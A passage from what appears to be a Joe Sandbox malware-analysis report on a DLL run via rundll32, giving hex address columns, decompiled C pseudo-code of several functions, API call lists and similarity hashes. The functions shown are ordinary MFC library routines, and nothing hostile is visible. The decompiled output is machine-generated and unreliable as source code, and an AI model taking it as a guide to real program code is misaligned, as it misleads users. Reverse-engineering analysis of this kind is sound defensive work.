                                                                                                            0x1000d28e
                                                                                                            0x1000d28c
                                                                                                            0x1000d291
                                                                                                            0x1000d295
                                                                                                            0x1000d29a
                                                                                                            0x1000d29b
                                                                                                            0x1000d29e
                                                                                                            0x1000d2a5
                                                                                                            0x1000d2ac
                                                                                                            0x1000d2b1
                                                                                                            0x1000d2b3
                                                                                                            0x1000d2b5
                                                                                                            0x1000d2b5
                                                                                                            0x1000d2b5
                                                                                                            0x1000d2b3
                                                                                                            0x1000d2b8
                                                                                                            0x1000d2bc
                                                                                                            0x1000d2cc
                                                                                                            0x1000d2cf
                                                                                                            0x1000d2d2
                                                                                                            0x1000d2d7
                                                                                                            0x1000d2d9
                                                                                                            0x1000d2db
                                                                                                            0x1000d2db
                                                                                                            0x1000d2db
                                                                                                            0x1000d2d9
                                                                                                            0x1000d2de
                                                                                                            0x1000d2e1
                                                                                                            0x1000d2f1
                                                                                                            0x1000d2f8
                                                                                                            0x1000d2ff
                                                                                                            0x1000d304
                                                                                                            0x1000d306
                                                                                                            0x1000d308
                                                                                                            0x1000d308
                                                                                                            0x1000d308
                                                                                                            0x1000d306
                                                                                                            0x1000d30a
                                                                                                            0x1000d30e
                                                                                                            0x1000d319
                                                                                                            0x1000d325
                                                                                                            0x1000d327
                                                                                                            0x1000d327
                                                                                                            0x1000d327
                                                                                                            0x1000d327
                                                                                                            0x1000d32e
                                                                                                            0x1000d332
                                                                                                            0x1000d33a
                                                                                                            0x1000d346
                                                                                                            0x1000d346
                                                                                                            0x1000d346
                                                                                                            0x1000d348
                                                                                                            0x1000d34c
                                                                                                            0x1000d357
                                                                                                            0x1000d363
                                                                                                            0x1000d363
                                                                                                            0x1000d363
                                                                                                            0x1000d36a
                                                                                                            0x1000d36d
                                                                                                            0x1000d374
                                                                                                            0x1000d37c
                                                                                                            0x1000d37c
                                                                                                            0x1000d37c
                                                                                                            0x1000d383
                                                                                                            0x1000d386
                                                                                                            0x1000d38d
                                                                                                            0x1000d399
                                                                                                            0x1000d399
                                                                                                            0x1000d399
                                                                                                            0x1000d3a0
                                                                                                            0x1000d3a3
                                                                                                            0x1000d3aa
                                                                                                            0x1000d3b6
                                                                                                            0x1000d3b6
                                                                                                            0x1000d3b6
                                                                                                            0x1000d3bd
                                                                                                            0x1000d3c0
                                                                                                            0x1000d3c7
                                                                                                            0x1000d3d3
                                                                                                            0x1000d3d3
                                                                                                            0x1000d3d3
                                                                                                            0x1000d3da
                                                                                                            0x1000d3dd
                                                                                                            0x1000d3e4
                                                                                                            0x1000d3f0
                                                                                                            0x1000d3f0
                                                                                                            0x1000d3f0
                                                                                                            0x1000d3f7
                                                                                                            0x1000d3fa
                                                                                                            0x1000d401
                                                                                                            0x1000d40d
                                                                                                            0x1000d40d
                                                                                                            0x1000d40d
                                                                                                            0x1000d414
                                                                                                            0x1000d417
                                                                                                            0x1000d41e
                                                                                                            0x1000d426
                                                                                                            0x1000d426
                                                                                                            0x1000d426
                                                                                                            0x1000d42d
                                                                                                            0x1000d430
                                                                                                            0x1000d437
                                                                                                            0x1000d43f
                                                                                                            0x1000d43f
                                                                                                            0x1000d43f
                                                                                                            0x1000d446
                                                                                                            0x1000d449
                                                                                                            0x1000d450
                                                                                                            0x1000d45c
                                                                                                            0x1000d45c
                                                                                                            0x1000d45c
                                                                                                            0x1000d463
                                                                                                            0x1000d466
                                                                                                            0x1000d46d
                                                                                                            0x1000d479
                                                                                                            0x1000d479
                                                                                                            0x1000d479
                                                                                                            0x1000d480
                                                                                                            0x1000d483
                                                                                                            0x1000d48a
                                                                                                            0x1000d492
                                                                                                            0x1000d492
                                                                                                            0x1000d492
                                                                                                            0x1000d494
                                                                                                            0x1000d497
                                                                                                            0x1000d49a
                                                                                                            0x1000d4a6
                                                                                                            0x1000d4a8
                                                                                                            0x1000d4ad
                                                                                                            0x1000d4b0
                                                                                                            0x1000d4b0
                                                                                                            0x1000d4b0
                                                                                                            0x1000d4bf
                                                                                                            0x1000d4c1
                                                                                                            0x1000d4c1
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _memset
                                                                                                            • String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
                                                                                                            • API String ID: 2102423945-4122032997
                                                                                                            • Opcode ID: c168e17b045a5f8c37e10149647611635915d659673ffe8c7442d4f1077db2e7
                                                                                                            • Instruction ID: 8836cd366f4edbb263e832dd9095b9ce1b533ce8c5134698fb64192b8290e0ae
                                                                                                            • Opcode Fuzzy Hash: c168e17b045a5f8c37e10149647611635915d659673ffe8c7442d4f1077db2e7
                                                                                                            • Instruction Fuzzy Hash: 7C8130B5C00259AAFB51DFE4C585BDEBBF8EF043C4F118166F908E6185E7749A84CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100121BA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 88%
                                                                                                            			E100121BA(void* __ebx, void** __ecx, void* __edx, void* __esi, char* _a4, short _a8) {
				signed int _v8;
				short _v72;
				char* _v76;
				signed int _v80;
				signed int* _v84;
				signed int _v88;
				intOrPtr _v92;
				void* __edi;
				void* __ebp;
				signed int _t54;
				void* _t66;
				short* _t70;
				signed int _t72;
				signed int _t81;
				signed int* _t83;
				short* _t84;
				void* _t91;
				signed int* _t98;
				signed int _t99;
				void** _t100;
				intOrPtr _t102;
				signed int _t104;
				signed int _t106;
				void* _t107;

				_t101 = __esi;
				_t97 = __edx;
				_t82 = __ebx;
				_t54 =  *0x10045580; // 0x6a53a566
				_v8 = _t54 ^ _t106;
				_t100 = __ecx;
				_v76 = _a4;
				if(__ecx[1] != 0) {
					_push(__ebx);
					_push(__esi);
					_t83 = GlobalLock( *__ecx);
					_v84 = _t83;
					_v88 = 0 | _t83[0] == 0x0000ffff;
					_v80 = E10011FFD(_t83);
					_t102 = (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1 + (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1;
					_v92 = _t102;
					if(_v88 == 0) {
						 *_t83 =  *_t83 | 0x00000040;
					} else {
						_t83[3] = _t83[3] | 0x00000040;
					}
					if(lstrlenA(_v76) >= 0x20) {
						L15:
						_t66 = 0;
					} else {
						_t97 = _t102 + MultiByteToWideChar(0, 0, _v76, 0xffffffff,  &_v72, 0x20) * 2;
						_v76 = _t97;
						if(_t97 < _t102) {
							goto L15;
						} else {
							_t70 = E10012028(_t83);
							_t91 = 0;
							_t84 = _t70;
							if(_v80 != 0) {
								_t81 = E100203EC(_t84 + _t102);
								_t97 = _v76;
								_t91 = _t102 + 2 + _t81 * 2;
							}
							_t33 = _t97 + 3; // 0x3
							_t98 = _v84;
							_t36 = _t84 + 3; // 0x3
							_t72 = _t91 + _t36 & 0xfffffffc;
							_t104 = _t84 + _t33 & 0xfffffffc;
							_v80 = _t72;
							if(_v88 == 0) {
								_t99 =  *(_t98 + 8) & 0x0000ffff;
							} else {
								_t99 =  *(_t98 + 0x10) & 0x0000ffff;
							}
							if(_v76 == _t91 || _t99 <= 0) {
								L17:
								 *_t84 = _a8;
								_t97 =  &_v72;
								E1001213D(_t84 + _v92, _t100, _t104, _t106, _t84 + _v92, _v76 - _v92,  &_v72, _v76 - _v92);
								_t100[1] = _t100[1] + _t104 - _v80;
								GlobalUnlock( *_t100);
								_t100[2] = _t100[2] & 0x00000000;
								_t66 = 1;
							} else {
								_t97 = _t100[1];
								_t95 = _t97 - _t72 + _v84;
								if(_t97 - _t72 + _v84 <= _t97) {
									E1001213D(_t84, _t100, _t104, _t106, _t104, _t95, _t72, _t95);
									_t107 = _t107 + 0x10;
									goto L17;
								} else {
									goto L15;
								}
							}
						}
					}
					_pop(_t101);
					_pop(_t82);
				} else {
					_t66 = 0;
				}
				return E1001FBB5(_t66, _t82, _v8 ^ _t106, _t97, _t100, _t101);
			}



























                                                                                                            0x100121ba
                                                                                                            0x100121ba
                                                                                                            0x100121ba
                                                                                                            0x100121c0
                                                                                                            0x100121c7
                                                                                                            0x100121ce
                                                                                                            0x100121d4
                                                                                                            0x100121d7
                                                                                                            0x100121e0
                                                                                                            0x100121e1
                                                                                                            0x100121ea
                                                                                                            0x100121f8
                                                                                                            0x100121fb
                                                                                                            0x10012203
                                                                                                            0x10012219
                                                                                                            0x1001221b
                                                                                                            0x1001221e
                                                                                                            0x10012226
                                                                                                            0x10012220
                                                                                                            0x10012220
                                                                                                            0x10012220
                                                                                                            0x10012235
                                                                                                            0x100122b3
                                                                                                            0x100122b3
                                                                                                            0x10012237
                                                                                                            0x1001224c
                                                                                                            0x10012251
                                                                                                            0x10012254
                                                                                                            0x00000000
                                                                                                            0x10012256
                                                                                                            0x10012257
                                                                                                            0x1001225d
                                                                                                            0x10012262
                                                                                                            0x10012264
                                                                                                            0x1001226a
                                                                                                            0x1001226f
                                                                                                            0x10012273
                                                                                                            0x10012273
                                                                                                            0x10012277
                                                                                                            0x1001227b
                                                                                                            0x1001227e
                                                                                                            0x10012282
                                                                                                            0x10012285
                                                                                                            0x1001228c
                                                                                                            0x1001228f
                                                                                                            0x10012297
                                                                                                            0x10012291
                                                                                                            0x10012291
                                                                                                            0x10012291
                                                                                                            0x1001229e
                                                                                                            0x100122c3
                                                                                                            0x100122ca
                                                                                                            0x100122d3
                                                                                                            0x100122db
                                                                                                            0x100122e8
                                                                                                            0x100122eb
                                                                                                            0x100122f1
                                                                                                            0x100122f7
                                                                                                            0x100122a5
                                                                                                            0x100122a5
                                                                                                            0x100122ac
                                                                                                            0x100122b1
                                                                                                            0x100122bb
                                                                                                            0x100122c0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100122b1
                                                                                                            0x1001229e
                                                                                                            0x10012254
                                                                                                            0x100122f8
                                                                                                            0x100122f9
                                                                                                            0x100121d9
                                                                                                            0x100121d9
                                                                                                            0x100121d9
                                                                                                            0x10012306

                                                                                                            APIs
                                                                                                            • GlobalLock.KERNEL32 ref: 100121E4
                                                                                                            • lstrlenA.KERNEL32(?), ref: 1001222C
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 10012246
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharGlobalLockMultiWidelstrlen
                                                                                                            • String ID: @
                                                                                                            • API String ID: 1529587224-2766056989
                                                                                                            • Opcode ID: 7b64cbffffd77d6f62e722d8fcd1ccb7852461faac1414003f9851645fddc8c1
                                                                                                            • Instruction ID: d0a0353f3703c4703b37301af5c7bc2eef77f2bc52e41b95a60fad612e9c4f7d
                                                                                                            • Opcode Fuzzy Hash: 7b64cbffffd77d6f62e722d8fcd1ccb7852461faac1414003f9851645fddc8c1
                                                                                                            • Instruction Fuzzy Hash: 0041AFB1900219EFDB15CFA4CC85AAEBBB5FF04350F148629E812EF185E774E9A5CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10013B33 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98libraryloaderCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 77%
                                                                                                            			E10013B33(void* __ebx, intOrPtr __ecx, void* __edi, CHAR* __esi, void* __eflags) {
				intOrPtr _t33;
				struct HINSTANCE__* _t44;
				signed int _t45;
				_Unknown_base(*)()* _t47;
				intOrPtr _t54;
				intOrPtr _t59;
				void* _t77;

				_t76 = __esi;
				_t75 = __edi;
				_push(0x20);
				E1001FC2D(E10033E8D, __ebx, __edi, __esi);
				_t59 = __ecx;
				 *((intOrPtr*)(_t77 - 0x2c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x1003876c;
				_t33 =  *((intOrPtr*)(__ecx + 0x44));
				 *(_t77 - 4) = 2;
				 *((intOrPtr*)(_t77 - 0x24)) = _t33;
				if(_t33 == 0) {
					L7:
					if( *((intOrPtr*)(_t59 + 0x4c)) == 0) {
						L12:
						E100124A0(_t59, _t59 + 0x24, _t75);
						E10010BA6(_t59 + 0x64);
						 *(_t77 - 0x20) =  *(_t77 - 0x20) & 0x00000000;
						_push(_t77 - 0x20);
						if(E10010D56(_t59, 0x1003b23c) >= 0) {
							_t76 = "mfcm80.dll";
							_t75 = _t77 - 0x1c;
							asm("movsd");
							asm("movsd");
							asm("movsw");
							asm("movsb");
							_t44 = GetModuleHandleA(_t77 - 0x1c);
							if(_t44 != 0) {
								_t47 = GetProcAddress(_t44, "MFCM80ReleaseManagedReferences");
								if(_t47 != 0) {
									 *_t47( *(_t77 - 0x20));
								}
							}
							_t45 =  *(_t77 - 0x20);
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						 *(_t77 - 4) = 1;
						E1001B91E(_t59 + 0x40);
						 *(_t77 - 4) = 0;
						E10012675(_t59, _t59 + 0x24, _t75);
						 *(_t77 - 4) =  *(_t77 - 4) | 0xffffffff;
						E100066CE(_t59);
						return E1001FCB0(_t59, _t75, _t76);
					}
					_t75 = _t59 + 0x40;
					do {
						_t76 = E1001B865(_t59, _t75, _t75, _t76);
						_t85 = _t76;
						if(_t76 != 0) {
							E100132FB(_t76);
							_push(_t76);
							E10004D75(_t59, _t75, _t76, _t85);
						}
					} while ( *((intOrPtr*)(_t59 + 0x4c)) != 0);
					goto L12;
				} else {
					_t75 = __ecx + 0x40;
					do {
						 *((intOrPtr*)(_t77 - 0x28)) = _t33;
						_t76 =  *((intOrPtr*)(E1000911A(_t77 - 0x24)));
						if(_t76 != 0) {
							_t54 =  *((intOrPtr*)(_t76 + 4));
							if(_t54 != 0) {
								_t82 =  *((intOrPtr*)(_t54 + 0x90));
								if( *((intOrPtr*)(_t54 + 0x90)) == 0) {
									E1001B896(_t75, _t76,  *((intOrPtr*)(_t77 - 0x28)));
									E100132FB(_t76);
									_push(_t76);
									E10004D75(_t59, _t75, _t76, _t82);
								}
							}
						}
						_t33 =  *((intOrPtr*)(_t77 - 0x24));
					} while (_t33 != 0);
					goto L7;
				}
			}










                                                                                                            0x10013b33
                                                                                                            0x10013b33
                                                                                                            0x10013b33
                                                                                                            0x10013b3a
                                                                                                            0x10013b3f
                                                                                                            0x10013b41
                                                                                                            0x10013b44
                                                                                                            0x10013b4a
                                                                                                            0x10013b4f
                                                                                                            0x10013b56
                                                                                                            0x10013b59
                                                                                                            0x10013ba1
                                                                                                            0x10013ba5
                                                                                                            0x10013bcb
                                                                                                            0x10013bce
                                                                                                            0x10013bd7
                                                                                                            0x10013bdc
                                                                                                            0x10013be3
                                                                                                            0x10013bf2
                                                                                                            0x10013bf4
                                                                                                            0x10013bf9
                                                                                                            0x10013bfc
                                                                                                            0x10013bfd
                                                                                                            0x10013bfe
                                                                                                            0x10013c04
                                                                                                            0x10013c05
                                                                                                            0x10013c0d
                                                                                                            0x10013c15
                                                                                                            0x10013c1d
                                                                                                            0x10013c22
                                                                                                            0x10013c24
                                                                                                            0x10013c1d
                                                                                                            0x10013c25
                                                                                                            0x10013c2b
                                                                                                            0x10013c2b
                                                                                                            0x10013c31
                                                                                                            0x10013c35
                                                                                                            0x10013c3d
                                                                                                            0x10013c41
                                                                                                            0x10013c46
                                                                                                            0x10013c4c
                                                                                                            0x10013c56
                                                                                                            0x10013c56
                                                                                                            0x10013ba7
                                                                                                            0x10013baa
                                                                                                            0x10013bb1
                                                                                                            0x10013bb3
                                                                                                            0x10013bb5
                                                                                                            0x10013bb9
                                                                                                            0x10013bbe
                                                                                                            0x10013bbf
                                                                                                            0x10013bc4
                                                                                                            0x10013bc5
                                                                                                            0x00000000
                                                                                                            0x10013b5b
                                                                                                            0x10013b5b
                                                                                                            0x10013b5e
                                                                                                            0x10013b5e
                                                                                                            0x10013b6c
                                                                                                            0x10013b70
                                                                                                            0x10013b72
                                                                                                            0x10013b77
                                                                                                            0x10013b79
                                                                                                            0x10013b80
                                                                                                            0x10013b87
                                                                                                            0x10013b8e
                                                                                                            0x10013b93
                                                                                                            0x10013b94
                                                                                                            0x10013b99
                                                                                                            0x10013b80
                                                                                                            0x10013b77
                                                                                                            0x10013b9a
                                                                                                            0x10013b9d
                                                                                                            0x00000000
                                                                                                            0x10013b5e

                                                                                                            APIs
                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 10013B3A
                                                                                                            • GetModuleHandleA.KERNEL32(?,1003B23C,00000000), ref: 10013C05
                                                                                                            • GetProcAddress.KERNEL32(00000000,MFCM80ReleaseManagedReferences), ref: 10013C15
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressH_prolog3_HandleModuleProc
                                                                                                            • String ID: MFCM80ReleaseManagedReferences$mfcm80.dll
                                                                                                            • API String ID: 2418878492-2500072749
                                                                                                            • Opcode ID: c6a1cd8c9f289d557e2193d8fdcd4d671c0258f6ce4de674d3c89b57e230dcd1
                                                                                                            • Instruction ID: effe031cbf4f857fff4e6ce51dcecab954aad45063f71112ee54279e012bf132
                                                                                                            • Opcode Fuzzy Hash: c6a1cd8c9f289d557e2193d8fdcd4d671c0258f6ce4de674d3c89b57e230dcd1
                                                                                                            • Instruction Fuzzy Hash: 8931AD75A046049FDF05DFA0C8857AE77F9EF48340F014098E905AF292EB79E985CB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10014290 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92comCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 83%
                                                                                                            			E10014290(signed int __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t49;
				signed int _t60;
				signed int _t64;
				signed int _t67;
				signed int _t80;
				signed int _t86;
				intOrPtr* _t90;
				void* _t91;

				_t74 = __ebx;
				_push(0x80);
				E1001FC2D(E10033F1F, __ebx, __edi, __esi);
				_t49 =  *((intOrPtr*)(_t91 + 8));
				_t90 = __ecx;
				 *((intOrPtr*)(_t91 - 0x50)) = 0;
				 *((intOrPtr*)(_t91 - 0x54)) = 0x10038078;
				 *(_t91 - 4) = 0;
				if(_t49 == 0 ||  *(_t49 + 4) == 0) {
					if(E100136F0(_t91 - 0x54, 0x11) != 0 || E100136F0(_t91 - 0x54, 0xd) != 0) {
						_t49 = _t91 - 0x54;
						goto L6;
					} else {
						 *((intOrPtr*)(_t90 + 0x64)) = 0;
					}
				} else {
					L6:
					_t11 = _t49 + 4; // 0x1000ecc8
					GetObjectA( *_t11, 0x3c, _t91 - 0x4c);
					_push(_t91 - 0x30);
					 *(_t91 - 0x78) = 0x20;
					E1000567F(_t74, _t91 - 0x58, 0, _t90, __eflags);
					 *((intOrPtr*)(_t91 - 0x74)) =  *((intOrPtr*)(_t91 - 0x58));
					 *((short*)(_t91 - 0x68)) =  *((intOrPtr*)(_t91 - 0x3c));
					 *(_t91 - 0x66) =  *(_t91 - 0x35) & 0x000000ff;
					 *(_t91 - 0x64) =  *(_t91 - 0x38) & 0x000000ff;
					 *(_t91 - 0x60) =  *(_t91 - 0x37) & 0x000000ff;
					 *(_t91 - 0x5c) =  *(_t91 - 0x36) & 0x000000ff;
					_t60 =  *(_t91 - 0x4c);
					__eflags = _t60;
					 *(_t91 - 4) = 1;
					_t74 = _t60;
					if(__eflags < 0) {
						_t74 =  ~_t60;
					}
					E100100ED(_t74, _t91 - 0x8c, 0, _t90, __eflags);
					 *(_t91 - 4) = 2;
					_t80 = GetDeviceCaps( *(_t91 - 0x84), 0x5a);
					_t64 = _t74 * 0xafc80;
					asm("cdq");
					_t86 = _t64 % _t80;
					_t90 = _t90 + 0x64;
					 *((intOrPtr*)(_t91 - 0x6c)) = 0;
					 *(_t91 - 0x70) = _t64 / _t80;
					E10010BA6(_t90);
					_t67 = _t91 - 0x78;
					__imp__#420(_t67, 0x1003b2dc, _t90,  *((intOrPtr*)(_t90 + 0x20)));
					__eflags = _t67;
					if(__eflags < 0) {
						 *_t90 = 0;
					}
					 *(_t91 - 4) = 1;
					E10010141(_t74, _t91 - 0x8c, 0, _t90, __eflags);
					__eflags =  *((intOrPtr*)(_t91 - 0x58)) + 0xfffffff0;
					E10001260( *((intOrPtr*)(_t91 - 0x58)) + 0xfffffff0, _t86);
				}
				 *(_t91 - 4) =  *(_t91 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t91 - 0x54)) = 0x10038068;
				E100102E5(_t91 - 0x54);
				return E1001FCB0(_t74, 0, _t90);
			}











                                                                                                            0x10014290
                                                                                                            0x10014290
                                                                                                            0x1001429a
                                                                                                            0x1001429f
                                                                                                            0x100142a4
                                                                                                            0x100142a6
                                                                                                            0x100142a9
                                                                                                            0x100142b2
                                                                                                            0x100142b5
                                                                                                            0x100142c8
                                                                                                            0x100142e0
                                                                                                            0x00000000
                                                                                                            0x100142d8
                                                                                                            0x100142d8
                                                                                                            0x100142d8
                                                                                                            0x100142e3
                                                                                                            0x100142e3
                                                                                                            0x100142e9
                                                                                                            0x100142ec
                                                                                                            0x100142f5
                                                                                                            0x100142f9
                                                                                                            0x10014300
                                                                                                            0x10014308
                                                                                                            0x1001430f
                                                                                                            0x10014318
                                                                                                            0x10014320
                                                                                                            0x10014327
                                                                                                            0x1001432e
                                                                                                            0x10014331
                                                                                                            0x10014334
                                                                                                            0x10014336
                                                                                                            0x1001433a
                                                                                                            0x1001433c
                                                                                                            0x10014340
                                                                                                            0x10014340
                                                                                                            0x1001434b
                                                                                                            0x10014358
                                                                                                            0x10014362
                                                                                                            0x10014366
                                                                                                            0x1001436c
                                                                                                            0x1001436d
                                                                                                            0x1001436f
                                                                                                            0x10014373
                                                                                                            0x10014376
                                                                                                            0x10014379
                                                                                                            0x10014384
                                                                                                            0x10014388
                                                                                                            0x1001438e
                                                                                                            0x10014390
                                                                                                            0x10014392
                                                                                                            0x10014392
                                                                                                            0x1001439a
                                                                                                            0x1001439e
                                                                                                            0x100143a6
                                                                                                            0x100143a9
                                                                                                            0x100143a9
                                                                                                            0x100143ae
                                                                                                            0x100143b5
                                                                                                            0x100143bc
                                                                                                            0x100143c6

                                                                                                            APIs
                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 1001429A
                                                                                                            • GetObjectA.GDI32(1000ECC8,0000003C,?), ref: 100142EC
                                                                                                            • GetDeviceCaps.GDI32(?,0000005A), ref: 1001435C
                                                                                                            • OleCreateFontIndirect.OLEAUT32(00000020,1003B2DC), ref: 10014388
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsCreateDeviceFontH_prolog3_IndirectObject
                                                                                                            • String ID:
                                                                                                            • API String ID: 2429671754-3916222277
                                                                                                            • Opcode ID: 972f0215ef0ccbc12416d13741993935b9c68b8aa4feb48cc9734c8c3317cb7c
                                                                                                            • Instruction ID: 2f8d2d43e09bdf50e625724661aa14f311a958ac26713a9e64237ed0808844fe
                                                                                                            • Opcode Fuzzy Hash: 972f0215ef0ccbc12416d13741993935b9c68b8aa4feb48cc9734c8c3317cb7c
                                                                                                            • Instruction Fuzzy Hash: C7417E74E012989FDB11CFE4C941ADDFBF4EF18340F10815AE955EB2A2EBB49A84CB11
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10006878 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 77%
                                                                                                            			E10006878(void* __edx, signed int _a116, char _a120) {
				void _v12;
				char _v16;
				signed int _v20;
				int _v24;
				char _v124;
				char _v172;
				intOrPtr _v184;
				int __ebx;
				signed int __edi;
				signed int __esi;
				signed int __ebp;
				signed int _t26;
				unsigned int _t28;
				intOrPtr _t35;
				unsigned int _t39;
				intOrPtr _t40;
				void* _t42;
				void* _t43;
				signed int _t45;

				_t45 =  &_v124;
				_t26 =  *0x10045580; // 0x6a53a566
				_a116 = _t26 ^ _t45;
				_push(_t43);
				_push(_t42);
				_t28 = GetMenuCheckMarkDimensions();
				_t38 = _t28;
				_t39 = _t28 >> 0x10;
				_v24 = _t39;
				if(_t28 <= 4 || __ecx <= 5) {
					_push(_t45);
					_push(_t39);
					_v172 = 0x10044410;
					E100209E8( &_v172, 0x1003e2dc);
					asm("int3");
					_push(4);
					E1001FBC4(E10032E9B, _t38, _t42, _t43);
					_t40 = E100105C8(0x104);
					_v184 = _t40;
					_t35 = 0;
					_v172 = 0;
					if(_t40 != 0) {
